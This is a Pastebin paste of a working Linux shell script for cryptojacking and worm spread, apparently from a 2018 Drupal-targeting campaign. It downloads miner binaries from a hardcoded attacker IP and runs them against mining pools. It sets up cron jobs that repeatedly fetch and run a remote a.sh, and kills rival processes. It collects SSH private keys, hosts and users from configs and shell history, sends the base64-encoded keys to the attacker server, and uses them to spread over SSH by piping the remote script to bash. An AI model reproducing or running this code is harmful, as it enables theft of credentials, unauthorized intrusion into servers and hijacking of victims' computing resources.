Guest User

something.sh

a guest
May 9th, 2018
3,559
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/sh
  2. #POOL=188.166.148.89:53:443
  3. POOL=188.166.148.89:444
  4. POOL=217.182.231.56:443
  5. basepath=$(cd `dirname $0`; pwd)
  6. XMHTTP="http://188.166.148.89:53"
  7. USERID=$1
  8. if [ -s /usr/share/man/11.gz ]; then exit; fi;
  9.  
  10. killme() {
  11.   killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|wget|curl|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
  12. }
  13. if [ $# -eq 0 ]; then USERID=$(hostname); fi
  14. if [ $# -eq 2 ]; then killme; fi
  15. echo $USERID;
  16. USERID="DRUPAL"
  17.  
  18. BIN1="xm64"
  19. BIN2="xm64s"
  20. BIN3="xm32s"
  21. #BIN4="xm32"
  22. WGET="wget"
  23. if [ -s /usr/bin/curl ]; then WGET="curl -o"; fi;if [ -s /usr/bin/wget ]; then WGET="wget -O"; fi;if [ $(uname -a | grep sparc |wc -l) -eq 1 ]; then echo sparc; exit; fi;if [ $(uname -a | grep AIX |wc -l) -eq 1 ]; then echo AIX; exit; fi;
  24.  
  25. #ps auxw|sort -rn -k3|head -1|awk '{if($3>60.0) print "kill -9 " $2}'|sh
  26. killa() {
  27. what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
  28. }
  29. killa v3
  30. #killa 34e2fg
  31. killall -9 curl;killall -9 wget;killa wget;killa curl
  32. ps auxw|grep jnkcfg|awk '{print $2}'|xargs kill -9
  33. crontab -r;echo "*/30 * * * * $WGET /tmp/.XO-lock $XMHTTP/a.sh; sh /tmp/.XO-lock;rm /tmp/.XO-lock" > /tmp/cron;crontab /tmp/cron ;rm -rf /tmp/cron
  34. cat /etc/crontab |awk '!/wget/' |awk '!/curl/' > /tmp/v
  35. mv -f /tmp/v /etc/crontab
  36. rm /tmp/v
  37. echo "*/30 * * * * root  $WGET /tmp/.XO-lock $XMHTTP/a.sh;sh /tmp/.XO-lock;rm /tmp/.XO-lock" >> /etc/crontab
  38. echo "Killing big CPU"
  39. VAR=$(ps uwx|awk '{print $2":"$3}'| grep -v CPU)
  40. for word in $VAR
  41. do
  42.   CPUUSAGE=$(echo $word|awk -F":" '{print $2}'|awk -F"." '{ print $1}')
  43.   if [ $CPUUSAGE -gt 60 ]; then    echo BIG $word;    PID=$(echo $word | awk -F":" '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P "er/v5|34e2|Xtmp|wf32N4|moy5Me|ssh"|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;
  44. done
  45. echo DONE
  46. proc=`grep -c ^processor /proc/cpuinfo`
  47. cores=$((($proc+1)/2)); if [ ! $core ]; then cores=2;fi
  48. num=$(($cores*3));/sbin/sysctl -w vm.nr_hugepages=`echo $num`
  49.  
  50. alr() {
  51.     already=$(ps aux|grep -E  "(ker/v5|moy5|34e2)" | grep -v grep | wc -l);already2=$(ps aux|awk  "/ker\/v5|moy5|34e2/" | awk '!/awk/'| wc -l)
  52. }
  53. dl_and_exec()
  54. {
  55.   REP=$1
  56. alr
  57. if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  58.     echo "Not running"
  59.     mkdir $REP/.jnks
  60.     echo /usr/bin/$WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN1
  61.     $WGET $REP/.jnks/chron-34e2fg http://188.166.148.89:53/$BIN1
  62.     chmod 707 $REP/.jnks/chron-34e2fg
  63.     $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN1  -k --donate-level 1 --cpu-priority 4 -B
  64.     alr
  65.  
  66.     if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  67.  
  68.       echo "First chron-34e2fg doesnt work"
  69.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN2
  70.       chmod 707 $REP/.jnks/chron-34e2fg
  71.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN2 -k --donate-level 1 --cpu-priority 4 -B
  72.  
  73. alr
  74.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  75.       echo "First  doesnt work"
  76.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN3
  77.       chmod 707 $REP/.jnks/chron-34e2fg
  78.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN3  -k --donate-level 1 --cpu-priority 4 -B
  79.      alr
  80.  return
  81.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  82.       echo "First  doesnt work"
  83.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN4
  84.       chmod 707 $REP/.jnks/chron-34e2fg
  85.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN4  -k --donate-level 1  -B
  86.      alr
  87.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  88.       echo "First  doesnt work"
  89.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN4
  90.       chmod 707 $REP/.jnks/chron-34e2fg
  91.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN4  -k --donate-level 1 --cpu-priority 4 -B
  92.  
  93.      alr
  94.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  95.       echo "First  doesnt work"
  96.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN5
  97.       chmod 707 $REP/.jnks/chron-34e2fg
  98.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN5  -k --donate-level 1 --cpu-priority 4 -B
  99.      alr
  100.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  101.       echo "First  doesnt work"
  102.       $WGET $REP/.jnks/chron-34e2fg $XMHTTP/$BIN6
  103.       chmod 707 $REP/.jnks/chron-34e2fg
  104.       $REP/.jnks/chron-34e2fg -o $POOL -u $USERID$BIN6  -k --donate-level 1 --cpu-priority 4 -B
  105.  
  106.  
  107.  
  108.  
  109.  
  110.      alr
  111.      if  [ ${already} -eq 0 ] && [ ${already2} -eq 0 ];then
  112.        $WGET $XMHTTP/NOWORK
  113.      fi;fi;fi;fi;fi;fi;fi;fi;
  114. }
  115.  
  116. if ( command -v ps > /dev/null && ( command -v grep > /dev/null || command -v awk > /dev/null ) )  # do this if ps exists and grep or awk exists
  117. then
  118.   echo "OK ps and grep or awk"
  119. #  dl_and_exec "/var/tmp"
  120.   dl_and_exec "/tmp"
  121. #  dl_and_exec "/dev/shm"
  122. #  dl_and_exec "."
  123. else
  124.    echo "Not ok" # do without grep possibility
  125.    killme
  126.    dl_and_exec "/tmp"
  127. fi;
  128.  
  129. cd /home
  130. already=$(ps aux|grep "yes yes" | grep -v grep | wc -l)
  131.  
  132. if  [ ${already} -ne 0 ] ; then
  133.   echo "killing yes and ssh"
  134.   killall yes
  135.   killall ssh
  136.   exit
  137. fi
  138.  
  139.  
  140.  
  141. KEYS=$(find ~/ /root /home -maxdepth 2 -name '\.ssh'|xargs find|awk '/pub|pem/')
  142. KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep IdentityFile|awk -F "IdentityFile" '{print $2 }')
  143. KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"|awk -F ' -i ' '{print $2}'|awk '{print $1'})
  144. cd ~
  145. HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep HostName|awk -F "HostName" '{print $2}')
  146. HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"| grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  147. HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"|tr ':' ' '|awk -F '@' '{print $2}'|awk -F '{print $1}')
  148. HOSTS4=$(cat /etc/hosts|awk '{print $1}')
  149. HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts| grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  150. HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  151. HOSTS="$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6"
  152. USERS=$(ls /home)
  153. USERS="$USERS root"
  154. USERS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)"|awk -F '@' '{print $1}'|awk '{print $NF'})
  155. USERS="$USERS $USERS2 $(whoami)"
  156. KEYS="$KEYS3 $KEYS2 $KEYS"
  157. HOSTS=$(echo $HOSTS|tr ' ' '\n'|sort|uniq|grep -v 127.0.0.1|grep -v localhost|grep -v 127.0.1.1|grep -v ff02|grep -v '\#'|grep -v '::1'|grep -v '00::0' |grep -v 188.166.148.89)
  158. USERS=$(echo $USERS|tr ' ' '\n'|sort|uniq|grep -v "/bin/bash"|grep -v "~"|grep -v "/"|grep -v keygen|grep -v "\-\-help"|grep -v ".ssh"|grep -v "ssh-agent"|grep -v sshpass|grep -v "\-l"|grep -v "\&")
  159. KEYS=$(echo $KEYS|tr ' ' '\n'|awk -F '\.pub' '{print $1}'|sort|uniq)
  160. KEYS2=""
  161. for key in $KEYS;
  162. do
  163.   echo $key;
  164.   if [ -f $key ];then
  165.     KEYS2="$KEYS2 $key"
  166.   fi;
  167. done;
  168. KEYS=$KEYS2
  169. echo "HOSTS $HOSTS"
  170. echo "USERS $USERS"
  171. echo "KEYS $KEYS"
  172. i=0
  173. for user in $USERS
  174. do
  175.   for host in $HOSTS
  176.   do
  177.     for key in $KEYS
  178.     do
  179.     ((i++))
  180.     if [ "${i}" -eq "10" ]; then sleep 5;
  181.       ps wx|grep "yes"|awk '{print $1}' | xargs kill -9&>/dev/null&
  182.       ps wx|grep "ssh -o"|awk '{print $1}' | xargs kill -9&>/dev/null&
  183.       ps wx|grep "$WGET"|awk '{print $1}' | xargs kill -9&>/dev/null&
  184.       i=0
  185.     fi;
  186.     chmod +r $key
  187.     mykey=$(cat $key|base64 -w0)
  188.     chmod 400 $key
  189.     me=$(hostname)
  190.       payload=$(echo ".$me.$mykey.$key.$user@$host") #|base64 -w0)
  191.       echo "ssh -oStrictHostKeyChecking=no -i $key $user@$host"
  192.       yes yes| ssh -oStrictHostKeyChecking=no -i $key $user@$host  "$WGET /dev/null $XMHTTP/YEY__$payload;$WGET - -q $XMHTTP/a.sh|bash;curl -o /dev/null $XMHTTP/CYEY__$payload;curl -o - $XMHTTP/a.sh| bash"&
  193.  
  194.     done
  195.   done
  196. done
  197.  
  198. echo "Ending"
  199. ps wx|grep "yes"|awk '{print $1}' | xargs kill -9&>/dev/null&
  200. ps wx|grep "ssh -o"|awk '{print $1}' | xargs kill -9&>/dev/null&
  201. ps wx|grep "$WGET"|awk '{print $1}' | xargs kill -9&>/dev/null&
  202.  
  203. echo RMing
  204. rm /dev/shm/.*
  205. rm /dev/shm/Xtmp
  206. rm -rf $basepath/.abc2 $basepath/.X11session3 $basepath/xmrig* $basepath/apache.sh
  207. rm $basepath/apache.sh
  208. rm -rf ./atd
  209. rm -rf /var/tmp/vmstat
  210. rm -rf /var/tmp/adcixstgtf.cf
  211. rm /var/tmp/wa
  212. killa vmstat
  213. echo Killing
  214. killall -9 initsyslog
  215. PID=$(ps auxw|grep -oP "\b[0-9a-f]{32}")
  216. PI1=$(echo $PID|awk '{print $1}')
  217. PI2=$(echo $PID|awk '{print $2}')
  218. PI3=$(echo $PID|awk '{print $3}')
  219. PI4=$(echo $PID|awk '{print $4}')
  220. PI5=$(echo $PID|awk '{print $5}')
  221. PI6=$(echo $PID|awk '{print $6}')
  222. PI7=$(echo $PID|awk '{print $7}')
  223. PI8=$(echo $PID|awk '{print $8}')
  224. PI9=$(echo $PID|awk '{print $9}')
  225. PI10=$(echo $PID|awk '{print $10}')
  226.  
  227. ps wx|grep $PI1 |awk '{print $1}' | xargs kill -9&>/dev/null&
  228. ps wx|grep $PI2 |awk '{print $1}' | xargs kill -9&>/dev/null&
  229. ps wx|grep $PI3|awk '{print $1}' | xargs kill -9&>/dev/null&
  230. ps wx|grep $PI4 |awk '{print $1}' | xargs kill -9&>/dev/null&
  231. ps wx|grep $PI5 |awk '{print $1}' | xargs kill -9&>/dev/null&
  232. ps wx|grep $PI6 |awk '{print $1}' | xargs kill -9&>/dev/null&
  233. ps wx|grep $PI7 |awk '{print $1}' | xargs kill -9&>/dev/null&
  234. ps wx|grep $PI8 |awk '{print $1}' | xargs kill -9&>/dev/null&
  235. ps wx|grep $PI9 |awk '{print $1}' | xargs kill -9&>/dev/null&
  236. ps wx|grep $PI10 |awk '{print $1}' | xargs kill -9&>/dev/null&
  237. ps wx|grep "/tmp/"|grep jenk | awk '{print $1}' | xargs kill -9&>/dev/null&
  238. ps wx|grep "/tmp/"|grep tomcat | awk '{print $1}' | xargs kill -9&>/dev/null&
  239. killa suppoie
  240. killa irq
  241. killa xmr
  242. killa mine
  243. killa config.json
  244. killa supsplk
  245. killa javajar
  246. killa javass
  247. pkill -f idceo
  248. ps auxw|grep 34e
  249. ps auxw|grep v5
RAW Paste Data